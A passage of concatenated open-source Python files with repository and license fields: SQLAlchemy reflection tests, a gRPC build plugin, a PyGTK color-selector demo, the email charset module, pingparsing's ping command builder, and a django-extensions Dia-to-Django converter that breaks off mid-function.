@testing.requires.table_reflection
@testing.requires.primary_key_constraint_reflection
@testing.requires.schemas
def test_get_pk_constraint_with_schema(self):
self._test_get_pk_constraint(schema='test_schema')
@testing.requires.table_reflection
@testing.provide_metadata
def test_deprecated_get_primary_keys(self):
meta = self.metadata
users = self.tables.users
insp = Inspector(meta.bind)
assert_raises_message(
sa_exc.SADeprecationWarning,
"Call to deprecated method get_primary_keys."
" Use get_pk_constraint instead.",
insp.get_primary_keys, users.name
)
@testing.provide_metadata
def _test_get_foreign_keys(self, schema=None):
meta = self.metadata
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
insp = inspect(meta.bind)
expected_schema = schema
# users
if testing.requires.self_referential_foreign_keys.enabled:
users_fkeys = insp.get_foreign_keys(users.name,
schema=schema)
fkey1 = users_fkeys[0]
with testing.requires.named_constraints.fail_if():
self.assert_(fkey1['name'] is not None)
eq_(fkey1['referred_schema'], expected_schema)
eq_(fkey1['referred_table'], users.name)
eq_(fkey1['referred_columns'], ['user_id', ])
if testing.requires.self_referential_foreign_keys.enabled:
eq_(fkey1['constrained_columns'], ['parent_user_id'])
#addresses
addr_fkeys = insp.get_foreign_keys(addresses.name,
schema=schema)
fkey1 = addr_fkeys[0]
with testing.requires.named_constraints.fail_if():
self.assert_(fkey1['name'] is not None)
eq_(fkey1['referred_schema'], expected_schema)
eq_(fkey1['referred_table'], users.name)
eq_(fkey1['referred_columns'], ['user_id', ])
eq_(fkey1['constrained_columns'], ['remote_user_id'])
@testing.requires.foreign_key_constraint_reflection
def test_get_foreign_keys(self):
self._test_get_foreign_keys()
@testing.requires.foreign_key_constraint_reflection
@testing.requires.schemas
def test_get_foreign_keys_with_schema(self):
self._test_get_foreign_keys(schema='test_schema')
@testing.provide_metadata
def _test_get_indexes(self, schema=None):
meta = self.metadata
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
# The database may decide to create indexes for foreign keys, etc.
# so there may be more indexes than expected.
insp = inspect(meta.bind)
indexes = insp.get_indexes('users', schema=schema)
expected_indexes = [
{'unique': False,
'column_names': ['test1', 'test2'],
'name': 'users_t_idx'},
{'unique': False,
'column_names': ['user_id', 'test2', 'test1'],
'name': 'users_all_idx'}
]
index_names = [d['name'] for d in indexes]
for e_index in expected_indexes:
assert e_index['name'] in index_names
index = indexes[index_names.index(e_index['name'])]
for key in e_index:
eq_(e_index[key], index[key])
@testing.requires.index_reflection
def test_get_indexes(self):
self._test_get_indexes()
@testing.requires.index_reflection
@testing.requires.schemas
def test_get_indexes_with_schema(self):
self._test_get_indexes(schema='test_schema')
@testing.requires.unique_constraint_reflection
def test_get_unique_constraints(self):
self._test_get_unique_constraints()
@testing.requires.unique_constraint_reflection
@testing.requires.schemas
def test_get_unique_constraints_with_schema(self):
self._test_get_unique_constraints(schema='test_schema')
@testing.provide_metadata
def _test_get_unique_constraints(self, schema=None):
uniques = sorted(
[
{'name': 'unique_a', 'column_names': ['a']},
{'name': 'unique_a_b_c', 'column_names': ['a', 'b', 'c']},
{'name': 'unique_c_a_b', 'column_names': ['c', 'a', 'b']},
{'name': 'unique_asc_key', 'column_names': ['asc', 'key']},
],
key=operator.itemgetter('name')
)
orig_meta = self.metadata
table = Table(
'testtbl', orig_meta,
Column('a', sa.String(20)),
Column('b', sa.String(30)),
Column('c', sa.Integer),
# reserved identifiers
Column('asc', sa.String(30)),
Column('key', sa.String(30)),
schema=schema
)
for uc in uniques:
table.append_constraint(
sa.UniqueConstraint(*uc['column_names'], name=uc['name'])
)
orig_meta.create_all()
inspector = inspect(orig_meta.bind)
reflected = sorted(
inspector.get_unique_constraints('testtbl', schema=schema),
key=operator.itemgetter('name')
)
for orig, refl in zip(uniques, reflected):
eq_(orig, refl)
@testing.provide_metadata
def _test_get_view_definition(self, schema=None):
meta = self.metadata
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
view_name1 = 'users_v'
view_name2 = 'email_addresses_v'
insp = inspect(meta.bind)
v1 = insp.get_view_definition(view_name1, schema=schema)
self.assert_(v1)
v2 = insp.get_view_definition(view_name2, schema=schema)
self.assert_(v2)
@testing.requires.view_reflection
def test_get_view_definition(self):
self._test_get_view_definition()
@testing.requires.view_reflection
@testing.requires.schemas
def test_get_view_definition_with_schema(self):
self._test_get_view_definition(schema='test_schema')
@testing.only_on("postgresql", "PG specific feature")
@testing.provide_metadata
def _test_get_table_oid(self, table_name, schema=None):
meta = self.metadata
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
insp = inspect(meta.bind)
oid = insp.get_table_oid(table_name, schema)
self.assert_(isinstance(oid, int))
def test_get_table_oid(self):
self._test_get_table_oid('users')
@testing.requires.schemas
def test_get_table_oid_with_schema(self):
self._test_get_table_oid('users', schema='test_schema')
@testing.requires.table_reflection
@testing.provide_metadata
def test_autoincrement_col(self):
"""test that 'autoincrement' is reflected according to sqla's policy.
Don't mark this test as unsupported for any backend !
(technically it fails with MySQL InnoDB since "id" comes before "id2")
A backend is better off not returning "autoincrement" at all,
instead of potentially returning "False" for an auto-incrementing
primary key column.
"""
meta = self.metadata
insp = inspect(meta.bind)
for tname, cname in [
('users', 'user_id'),
('email_addresses', 'address_id'),
('dingalings', 'dingaling_id'),
]:
cols = insp.get_columns(tname)
id_ = dict((c['name'], c) for c in cols)[cname]
assert id_.get('autoincrement', True)
__all__ = ('ComponentReflectionTest', 'HasTableTest')
| gpl-3.0 |
leifurhauks/grpc | tools/buildgen/plugins/expand_bin_attrs.py | 31 | 2515 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Buildgen expand binary attributes plugin.
This fills in any optional attributes.
"""
def mako_plugin(dictionary):
"""The exported plugin code for expand_filegroups.
The list of libs in the build.yaml file can contain "filegroups" tags.
These refer to the filegroups in the root object. We will expand and
merge filegroups on the src, headers and public_headers properties.
"""
targets = dictionary.get('targets')
default_platforms = ['windows', 'posix', 'linux', 'mac']
for tgt in targets:
tgt['flaky'] = tgt.get('flaky', False)
tgt['platforms'] = sorted(tgt.get('platforms', default_platforms))
tgt['ci_platforms'] = sorted(tgt.get('ci_platforms', tgt['platforms']))
tgt['boringssl'] = tgt.get('boringssl', False)
tgt['zlib'] = tgt.get('zlib', False)
tgt['gtest'] = tgt.get('gtest', False)
libs = dictionary.get('libs')
for lib in libs:
lib['boringssl'] = lib.get('boringssl', False)
lib['zlib'] = lib.get('zlib', False)
| bsd-3-clause |
GNOME/pygtk | examples/pygtk-demo/demos/colorsel.py | 6 | 2059 | #!/usr/bin/env python
"""Color Selector
GtkColorSelection lets the user choose a color. GtkColorSelectionDialog is a
prebuilt dialog containing a GtkColorSelection."""
import pygtk
pygtk.require('2.0')
import gtk
class ColorSelectorDemo(gtk.Window):
color = gtk.gdk.color_parse("blue")
def __init__(self, parent=None):
# Create the toplevel window
gtk.Window.__init__(self)
try:
self.set_screen(parent.get_screen())
except AttributeError:
self.connect('destroy', lambda *w: gtk.main_quit())
self.set_title(self.__class__.__name__)
self.set_border_width(8)
vbox = gtk.VBox()
vbox.set_border_width(8)
self.add(vbox)
# Create the color swatch area
frame = gtk.Frame()
frame.set_shadow_type(gtk.SHADOW_IN)
vbox.pack_start(frame, True, True, 8)
self.d_area = gtk.DrawingArea()
self.d_area.set_size_request(200, 200)
self.d_area.modify_bg(gtk.STATE_NORMAL, self.color)
frame.add(self.d_area)
alignment = gtk.Alignment(1.0, 0.5, 0.0, 0.0)
button = gtk.Button("_Change the above color")
alignment.add(button)
vbox.pack_start(alignment, True, True)
button.connect('clicked', self.on_change_color_clicked)
button.set_flags(gtk.CAN_DEFAULT)
button.grab_default()
self.show_all()
def on_change_color_clicked(self, button):
dialog = gtk.ColorSelectionDialog("Changing color")
dialog.set_transient_for(self)
colorsel = dialog.colorsel
colorsel.set_previous_color(self.color)
colorsel.set_current_color(self.color)
colorsel.set_has_palette(True)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.color = colorsel.get_current_color()
self.d_area.modify_bg(gtk.STATE_NORMAL, self.color)
dialog.destroy()
return True
def main():
ColorSelectorDemo()
gtk.main()
if __name__ == '__main__':
main()
| lgpl-2.1 |
0Chencc/CTFCrackTools | Lib/Lib/email/charset.py | 180 | 16043 | # Copyright (C) 2001-2006 Python Software Foundation
# Author: Ben Gertzfield, Barry Warsaw
# Contact: [email protected]
__all__ = [
'Charset',
'add_alias',
'add_charset',
'add_codec',
]
import codecs
import email.base64mime
import email.quoprimime
from email import errors
from email.encoders import encode_7or8bit
# Flags for types of header encodings
QP = 1 # Quoted-Printable
BASE64 = 2 # Base64
SHORTEST = 3 # the shorter of QP and base64, but only for headers
# In "=?charset?q?hello_world?=", the =?, ?q?, and ?= add up to 7
MISC_LEN = 7
DEFAULT_CHARSET = 'us-ascii'
# Defaults
CHARSETS = {
# input header enc body enc output conv
'iso-8859-1': (QP, QP, None),
'iso-8859-2': (QP, QP, None),
'iso-8859-3': (QP, QP, None),
'iso-8859-4': (QP, QP, None),
# iso-8859-5 is Cyrillic, and not especially used
# iso-8859-6 is Arabic, also not particularly used
# iso-8859-7 is Greek, QP will not make it readable
# iso-8859-8 is Hebrew, QP will not make it readable
'iso-8859-9': (QP, QP, None),
'iso-8859-10': (QP, QP, None),
# iso-8859-11 is Thai, QP will not make it readable
'iso-8859-13': (QP, QP, None),
'iso-8859-14': (QP, QP, None),
'iso-8859-15': (QP, QP, None),
'iso-8859-16': (QP, QP, None),
'windows-1252':(QP, QP, None),
'viscii': (QP, QP, None),
'us-ascii': (None, None, None),
'big5': (BASE64, BASE64, None),
'gb2312': (BASE64, BASE64, None),
'euc-jp': (BASE64, None, 'iso-2022-jp'),
'shift_jis': (BASE64, None, 'iso-2022-jp'),
'iso-2022-jp': (BASE64, None, None),
'koi8-r': (BASE64, BASE64, None),
'utf-8': (SHORTEST, BASE64, 'utf-8'),
# We're making this one up to represent raw unencoded 8-bit
'8bit': (None, BASE64, 'utf-8'),
}
# Aliases for other commonly-used names for character sets. Map
# them to the real ones used in email.
ALIASES = {
'latin_1': 'iso-8859-1',
'latin-1': 'iso-8859-1',
'latin_2': 'iso-8859-2',
'latin-2': 'iso-8859-2',
'latin_3': 'iso-8859-3',
'latin-3': 'iso-8859-3',
'latin_4': 'iso-8859-4',
'latin-4': 'iso-8859-4',
'latin_5': 'iso-8859-9',
'latin-5': 'iso-8859-9',
'latin_6': 'iso-8859-10',
'latin-6': 'iso-8859-10',
'latin_7': 'iso-8859-13',
'latin-7': 'iso-8859-13',
'latin_8': 'iso-8859-14',
'latin-8': 'iso-8859-14',
'latin_9': 'iso-8859-15',
'latin-9': 'iso-8859-15',
'latin_10':'iso-8859-16',
'latin-10':'iso-8859-16',
'cp949': 'ks_c_5601-1987',
'euc_jp': 'euc-jp',
'euc_kr': 'euc-kr',
'ascii': 'us-ascii',
}
# Map charsets to their Unicode codec strings.
CODEC_MAP = {
'gb2312': 'eucgb2312_cn',
'big5': 'big5_tw',
# Hack: We don't want *any* conversion for stuff marked us-ascii, as all
# sorts of garbage might be sent to us in the guise of 7-bit us-ascii.
# Let that stuff pass through without conversion to/from Unicode.
'us-ascii': None,
}
# Convenience functions for extending the above mappings
def add_charset(charset, header_enc=None, body_enc=None, output_charset=None):
"""Add character set properties to the global registry.
charset is the input character set, and must be the canonical name of a
character set.
Optional header_enc and body_enc is either Charset.QP for
quoted-printable, Charset.BASE64 for base64 encoding, Charset.SHORTEST for
the shortest of qp or base64 encoding, or None for no encoding. SHORTEST
is only valid for header_enc. It describes how message headers and
message bodies in the input charset are to be encoded. Default is no
encoding.
Optional output_charset is the character set that the output should be
in. Conversions will proceed from input charset, to Unicode, to the
output charset when the method Charset.convert() is called. The default
is to output in the same character set as the input.
Both input_charset and output_charset must have Unicode codec entries in
the module's charset-to-codec mapping; use add_codec(charset, codecname)
to add codecs the module does not know about. See the codecs module's
documentation for more information.
"""
if body_enc == SHORTEST:
raise ValueError('SHORTEST not allowed for body_enc')
CHARSETS[charset] = (header_enc, body_enc, output_charset)
def add_alias(alias, canonical):
"""Add a character set alias.
alias is the alias name, e.g. latin-1
canonical is the character set's canonical name, e.g. iso-8859-1
"""
ALIASES[alias] = canonical
def add_codec(charset, codecname):
"""Add a codec that map characters in the given charset to/from Unicode.
charset is the canonical name of a character set. codecname is the name
of a Python codec, as appropriate for the second argument to the unicode()
built-in, or to the encode() method of a Unicode string.
"""
CODEC_MAP[charset] = codecname
class Charset:
"""Map character sets to their email properties.
This class provides information about the requirements imposed on email
for a specific character set. It also provides convenience routines for
converting between character sets, given the availability of the
applicable codecs. Given a character set, it will do its best to provide
information on how to use that character set in an email in an
RFC-compliant way.
Certain character sets must be encoded with quoted-printable or base64
when used in email headers or bodies. Certain character sets must be
converted outright, and are not allowed in email. Instances of this
module expose the following information about a character set:
input_charset: The initial character set specified. Common aliases
are converted to their `official' email names (e.g. latin_1
is converted to iso-8859-1). Defaults to 7-bit us-ascii.
header_encoding: If the character set must be encoded before it can be
used in an email header, this attribute will be set to
Charset.QP (for quoted-printable), Charset.BASE64 (for
base64 encoding), or Charset.SHORTEST for the shortest of
QP or BASE64 encoding. Otherwise, it will be None.
body_encoding: Same as header_encoding, but describes the encoding for the
mail message's body, which indeed may be different than the
header encoding. Charset.SHORTEST is not allowed for
body_encoding.
output_charset: Some character sets must be converted before the can be
used in email headers or bodies. If the input_charset is
one of them, this attribute will contain the name of the
charset output will be converted to. Otherwise, it will
be None.
input_codec: The name of the Python codec used to convert the
input_charset to Unicode. If no conversion codec is
necessary, this attribute will be None.
output_codec: The name of the Python codec used to convert Unicode
to the output_charset. If no conversion codec is necessary,
this attribute will have the same value as the input_codec.
"""
def __init__(self, input_charset=DEFAULT_CHARSET):
# RFC 2046, $4.1.2 says charsets are not case sensitive. We coerce to
# unicode because its .lower() is locale insensitive. If the argument
# is already a unicode, we leave it at that, but ensure that the
# charset is ASCII, as the standard (RFC XXX) requires.
try:
if isinstance(input_charset, unicode):
input_charset.encode('ascii')
else:
input_charset = unicode(input_charset, 'ascii')
except UnicodeError:
raise errors.CharsetError(input_charset)
input_charset = input_charset.lower().encode('ascii')
# Set the input charset after filtering through the aliases and/or codecs
if not (input_charset in ALIASES or input_charset in CHARSETS):
try:
input_charset = codecs.lookup(input_charset).name
except LookupError:
pass
self.input_charset = ALIASES.get(input_charset, input_charset)
# We can try to guess which encoding and conversion to use by the
# charset_map dictionary. Try that first, but let the user override
# it.
henc, benc, conv = CHARSETS.get(self.input_charset,
(SHORTEST, BASE64, None))
if not conv:
conv = self.input_charset
# Set the attributes, allowing the arguments to override the default.
self.header_encoding = henc
self.body_encoding = benc
self.output_charset = ALIASES.get(conv, conv)
# Now set the codecs. If one isn't defined for input_charset,
# guess and try a Unicode codec with the same name as input_codec.
self.input_codec = CODEC_MAP.get(self.input_charset,
self.input_charset)
self.output_codec = CODEC_MAP.get(self.output_charset,
self.output_charset)
def __str__(self):
return self.input_charset.lower()
__repr__ = __str__
def __eq__(self, other):
return str(self) == str(other).lower()
def __ne__(self, other):
return not self.__eq__(other)
def get_body_encoding(self):
"""Return the content-transfer-encoding used for body encoding.
This is either the string `quoted-printable' or `base64' depending on
the encoding used, or it is a function in which case you should call
the function with a single argument, the Message object being
encoded. The function should then set the Content-Transfer-Encoding
header itself to whatever is appropriate.
Returns "quoted-printable" if self.body_encoding is QP.
Returns "base64" if self.body_encoding is BASE64.
Returns "7bit" otherwise.
"""
assert self.body_encoding != SHORTEST
if self.body_encoding == QP:
return 'quoted-printable'
elif self.body_encoding == BASE64:
return 'base64'
else:
return encode_7or8bit
def convert(self, s):
"""Convert a string from the input_codec to the output_codec."""
if self.input_codec != self.output_codec:
return unicode(s, self.input_codec).encode(self.output_codec)
else:
return s
def to_splittable(self, s):
"""Convert a possibly multibyte string to a safely splittable format.
Uses the input_codec to try and convert the string to Unicode, so it
can be safely split on character boundaries (even for multibyte
characters).
Returns the string as-is if it isn't known how to convert it to
Unicode with the input_charset.
Characters that could not be converted to Unicode will be replaced
with the Unicode replacement character U+FFFD.
"""
if isinstance(s, unicode) or self.input_codec is None:
return s
try:
return unicode(s, self.input_codec, 'replace')
except LookupError:
# Input codec not installed on system, so return the original
# string unchanged.
return s
def from_splittable(self, ustr, to_output=True):
"""Convert a splittable string back into an encoded string.
Uses the proper codec to try and convert the string from Unicode back
into an encoded format. Return the string as-is if it is not Unicode,
or if it could not be converted from Unicode.
Characters that could not be converted from Unicode will be replaced
with an appropriate character (usually '?').
If to_output is True (the default), uses output_codec to convert to an
encoded format. If to_output is False, uses input_codec.
"""
if to_output:
codec = self.output_codec
else:
codec = self.input_codec
if not isinstance(ustr, unicode) or codec is None:
return ustr
try:
return ustr.encode(codec, 'replace')
except LookupError:
# Output codec not installed
return ustr
def get_output_charset(self):
"""Return the output character set.
This is self.output_charset if that is not None, otherwise it is
self.input_charset.
"""
return self.output_charset or self.input_charset
def encoded_header_len(self, s):
"""Return the length of the encoded header string."""
cset = self.get_output_charset()
# The len(s) of a 7bit encoding is len(s)
if self.header_encoding == BASE64:
return email.base64mime.base64_len(s) + len(cset) + MISC_LEN
elif self.header_encoding == QP:
return email.quoprimime.header_quopri_len(s) + len(cset) + MISC_LEN
elif self.header_encoding == SHORTEST:
lenb64 = email.base64mime.base64_len(s)
lenqp = email.quoprimime.header_quopri_len(s)
return min(lenb64, lenqp) + len(cset) + MISC_LEN
else:
return len(s)
def header_encode(self, s, convert=False):
"""Header-encode a string, optionally converting it to output_charset.
If convert is True, the string will be converted from the input
charset to the output charset automatically. This is not useful for
multibyte character sets, which have line length issues (multibyte
characters must be split on a character, not a byte boundary); use the
high-level Header class to deal with these issues. convert defaults
to False.
The type of encoding (base64 or quoted-printable) will be based on
self.header_encoding.
"""
cset = self.get_output_charset()
if convert:
s = self.convert(s)
# 7bit/8bit encodings return the string unchanged (modulo conversions)
if self.header_encoding == BASE64:
return email.base64mime.header_encode(s, cset)
elif self.header_encoding == QP:
return email.quoprimime.header_encode(s, cset, maxlinelen=None)
elif self.header_encoding == SHORTEST:
lenb64 = email.base64mime.base64_len(s)
lenqp = email.quoprimime.header_quopri_len(s)
if lenb64 < lenqp:
return email.base64mime.header_encode(s, cset)
else:
return email.quoprimime.header_encode(s, cset, maxlinelen=None)
else:
return s
def body_encode(self, s, convert=True):
"""Body-encode a string and convert it to output_charset.
If convert is True (the default), the string will be converted from
the input charset to output charset automatically. Unlike
header_encode(), there are no issues with byte boundaries and
multibyte charsets in email bodies, so this is usually pretty safe.
The type of encoding (base64 or quoted-printable) will be based on
self.body_encoding.
"""
if convert:
s = self.convert(s)
# 7bit/8bit encodings return the string unchanged (module conversions)
if self.body_encoding is BASE64:
return email.base64mime.body_encode(s)
elif self.body_encoding is QP:
return email.quoprimime.body_encode(s)
else:
return s
| gpl-3.0 |
thombashi/pingparsing | pingparsing/_cmd_maker.py | 1 | 7021 | import abc
import math
from typing import List, Optional
import humanreadable as hr
from subprocrunner.typing import Command
from typepy import Integer
from ._typing import PingAddOpts
DEFAULT_DEADLINE = 3
class PingCmdMaker(metaclass=abc.ABCMeta):
def __init__(
self,
count: Optional[int] = None,
deadline: Optional[hr.Time] = None,
timeout: Optional[hr.Time] = None,
packet_size: Optional[int] = None,
ttl: Optional[int] = None,
interface: Optional[str] = None,
is_ipv6: bool = False,
timestamp: bool = False,
auto_codepage: bool = False,
ping_option: PingAddOpts = "",
):
self.count = count
if self.count is not None:
self.count = Integer(self.count).convert()
self.deadline = deadline
self.timeout = timeout
self._packet_size = packet_size
self._ttl = ttl
self.interface = interface
self._is_ipv6 = is_ipv6
self._timestamp = timestamp
self.auto_codepage = auto_codepage
self.ping_option = ping_option
def make_cmd(self, destination: str) -> Command:
command_items = (
self._get_initial_command()
+ self._get_ping_command()
+ self._get_interface_option()
+ self._get_deadline_option()
+ self._get_timeout_option()
+ self._get_count_option()
+ self._get_packet_size_option()
+ self._get_ttl_option()
)
if self._timestamp:
command_items.extend(self._get_timestamp_option())
if isinstance(self.ping_option, str):
command_items.extend(self.ping_option.strip().split())
else:
command_items.extend(self.ping_option)
command_items.append(self._get_destination_host(destination))
if self._require_shell_command():
return " ".join(command_items)
return command_items
def _get_initial_command(self) -> List[str]:
return []
@abc.abstractmethod
def _get_destination_host(self, destination: str) -> str:
raise NotImplementedError()
@abc.abstractmethod
def _get_ping_command(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_quiet_option(self) -> str:
raise NotImplementedError()
@abc.abstractmethod
def _get_timestamp_option(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_deadline_option(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_timeout_option(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_count_option(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_packet_size_option(self) -> List[str]:
raise NotImplementedError()
@abc.abstractmethod
def _get_ttl_option(self) -> List[str]:
raise NotImplementedError()
def _get_interface_option(self) -> List[str]:
return []
def _require_shell_command(self) -> bool:
return False
class PosixPingCmdMaker(PingCmdMaker):
def _get_destination_host(self, destination: str) -> str:
return destination
def _get_ping_command(self) -> List[str]:
if self._is_ipv6:
return ["ping6"]
return ["ping"]
def _get_quiet_option(self) -> str:
return "-q"
def _get_timestamp_option(self) -> List[str]:
return ["-D", "-O"]
def _get_count_option(self) -> List[str]:
if self.count is None:
return []
return ["-c", str(self.count)]
def _get_packet_size_option(self) -> List[str]:
if self._packet_size is None:
return []
return ["-s", str(self._packet_size)]
class MacosPingCmdMaker(PosixPingCmdMaker):
def _get_ttl_option(self) -> List[str]:
if self._ttl is None:
return []
return ["-T", str(self._ttl)]
def _get_deadline_option(self) -> List[str]:
if self.deadline is None:
if self.count:
return []
deadline = DEFAULT_DEADLINE
else:
deadline = int(math.ceil(self.deadline.seconds))
if self._is_ipv6:
# there is no timeout option for macOS ping6.
# so, using -i and -c option to simulate timeout.
return ["-i", "1", "-c", str(deadline)]
return ["-t", str(deadline)]
def _get_timeout_option(self) -> List[str]:
return []
class LinuxPingCmdMaker(PosixPingCmdMaker):
def _get_ttl_option(self) -> List[str]:
if self._ttl is None:
return []
return ["-t", str(self._ttl)]
def _get_deadline_option(self) -> List[str]:
if self.deadline is None:
if self.count:
return []
deadline = DEFAULT_DEADLINE
else:
deadline = int(math.ceil(self.deadline.seconds))
return ["-w", str(deadline)]
def _get_timeout_option(self) -> List[str]:
if self.timeout is None:
return []
return ["-W", str(int(math.ceil(self.timeout.seconds)))]
def _get_interface_option(self) -> List[str]:
if not self.interface:
return []
return ["-I", self.interface]
class WindowsPingCmdMaker(PingCmdMaker):
def _get_initial_command(self) -> List[str]:
if self.auto_codepage:
return ["chcp 437 &"]
return []
def _get_destination_host(self, destination: str) -> str:
if self._is_ipv6:
return "{:s}%{}".format(destination, self.interface)
return destination
def _get_ping_command(self) -> List[str]:
return ["ping"]
def _get_quiet_option(self) -> str:
return ""
def _get_timestamp_option(self) -> List[str]:
return []
def _get_deadline_option(self) -> List[str]:
if self.deadline is None:
if self.count:
return []
deadline = DEFAULT_DEADLINE
else:
deadline = int(math.ceil(self.deadline.seconds))
# ping for Windows does not have the option with equals to the deadline option.
return ["-n", str(deadline)]
def _get_timeout_option(self) -> List[str]:
if self.timeout is None:
return []
return ["-w", str(int(math.ceil(self.timeout.milliseconds)))]
def _get_count_option(self) -> List[str]:
if self.count is None:
return []
return ["-n", str(self.count)]
def _get_packet_size_option(self) -> List[str]:
if self._packet_size is None:
return []
return ["-l", str(self._packet_size)]
def _get_ttl_option(self) -> List[str]:
if self._ttl is None:
return []
return ["-i", str(self._ttl)]
def _require_shell_command(self) -> bool:
return self.auto_codepage
| mit |
hdinsight/hue | desktop/core/ext-py/django-extensions-1.5.0/django_extensions/utils/dia2django.py | 37 | 10304 | # -*- coding: UTF-8 -*-
##Author Igor Támara [email protected]
##Use this little program as you wish, if you
#include it in your work, let others know you
#are using it preserving this note, you have
#the right to make derivative works, Use it
#at your own risk.
#Tested to work on(etch testing 13-08-2007):
# Python 2.4.4 (#2, Jul 17 2007, 11:56:54)
# [GCC 4.1.3 20070629 (prerelease) (Debian 4.1.2-13)] on linux2
dependclasses = ["User", "Group", "Permission", "Message"]
import re
import six
import sys
import gzip
import codecs
from xml.dom.minidom import * # NOQA
#Type dictionary translation types SQL -> Django
tsd = {
"text": "TextField",
"date": "DateField",
"varchar": "CharField",
"int": "IntegerField",
"float": "FloatField",
"serial": "AutoField",
"boolean": "BooleanField",
"numeric": "FloatField",
"timestamp": "DateTimeField",
"bigint": "IntegerField",
"datetime": "DateTimeField",
"date": "DateField",
"time": "TimeField",
"bool": "BooleanField",
"int": "IntegerField",
}
#convert varchar -> CharField
v2c = re.compile('varchar\((\d+)\)')
def index(fks, id):
"""Looks for the id on fks, fks is an array of arrays, each array has on [1]
the id of the class in a dia diagram. When not present returns None, else
it returns the position of the class with id on fks"""
for i, j in fks.items():
if fks[i][1] == id:
return i
return None
def addparentstofks(rels, fks):
"""Gets a list of relations, between parents and sons and a dict of
clases named in dia, and modifies the fks to add the parent as fk to get
order on the output of classes and replaces the base class of the son, to
put the class parent name.
"""
for j in rels:
son = index(fks, j[1])
parent = index(fks, j[0])
fks[son][2] = fks[son][2].replace("models.Model", parent)
if parent not in fks[son][0]:
fks[son][0].append(parent)
def dia2django(archivo):
models_txt = ''
f = codecs.open(archivo, "rb")
#dia files are gzipped
data = gzip.GzipFile(fileobj=f).read()
ppal = parseString(data)
#diagram -> layer -> object -> UML - Class -> name, (attribs : composite -> name,type)
datos = ppal.getElementsByTagName("dia:diagram")[0].getElementsByTagName("dia:layer")[0].getElementsByTagName("dia:object")
clases = {}
herit = []
imports = six.u("")
for i in datos:
#Look for the classes
if i.getAttribute("type") == "UML - Class":
myid = i.getAttribute("id")
for j in i.childNodes:
if j.nodeType == Node.ELEMENT_NODE and j.hasAttributes():
if j.getAttribute("name") == "name":
actclas = j.getElementsByTagName("dia:string")[0].childNodes[0].data[1:-1]
myname = "\nclass %s(models.Model) :\n" % actclas
clases[actclas] = [[], myid, myname, 0]
if j.getAttribute("name") == "attributes":
for l in j.getElementsByTagName("dia:composite"):
if l.getAttribute("type") == "umlattribute":
#Look for the attribute name and type
for k in l.getElementsByTagName("dia:attribute"):
if k.getAttribute("name") == "name":
nc = k.getElementsByTagName("dia:string")[0].childNodes[0].data[1:-1]
elif k.getAttribute("name") == "type":
tc = k.getElementsByTagName("dia:string")[0].childNodes[0].data[1:-1]
elif k.getAttribute("name") == "value":
val = k.getElementsByTagName("dia:string")[0].childNodes[0].data[1:-1]
if val == '##':
val = ''
elif k.getAttribute("name") == "visibility" and k.getElementsByTagName("dia:enum")[0].getAttribute("val") == "2":
if tc.replace(" ", "").lower().startswith("manytomanyfield("):
#If we find a class not in our model that is marked as being to another model
newc = tc.replace(" ", "")[16:-1]
if dependclasses.count(newc) == 0:
dependclasses.append(newc)
if tc.replace(" ", "").lower().startswith("foreignkey("):
#If we find a class not in our model that is marked as being to another model
newc = tc.replace(" ", "")[11:-1]
if dependclasses.count(newc) == 0:
dependclasses.append(newc)
#Mapping SQL types to Django
varch = v2c.search(tc)
if tc.replace(" ", "").startswith("ManyToManyField("):
myfor = tc.replace(" ", "")[16:-1]
if actclas == myfor:
#In case of a recursive type, we use 'self'
tc = tc.replace(myfor, "'self'")
elif clases[actclas][0].count(myfor) == 0:
#Adding related class
if myfor not in dependclasses:
#In case we are using Auth classes or external via protected dia visibility
clases[actclas][0].append(myfor)
tc = "models." + tc
if len(val) > 0:
tc = tc.replace(")", "," + val + ")")
elif tc.find("Field") != -1:
if tc.count("()") > 0 and len(val) > 0:
tc = "models.%s" % tc.replace(")", "," + val + ")")
else:
tc = "models.%s(%s)" % (tc, val)
elif tc.replace(" ", "").startswith("ForeignKey("):
myfor = tc.replace(" ", "")[11:-1]
if actclas == myfor:
#In case of a recursive type, we use 'self'
tc = tc.replace(myfor, "'self'")
elif clases[actclas][0].count(myfor) == 0:
#Adding foreign classes
if myfor not in dependclasses:
#In case we are using Auth classes
clases[actclas][0].append(myfor)
tc = "models." + tc
if len(val) > 0:
tc = tc.replace(")", "," + val + ")")
elif varch is None:
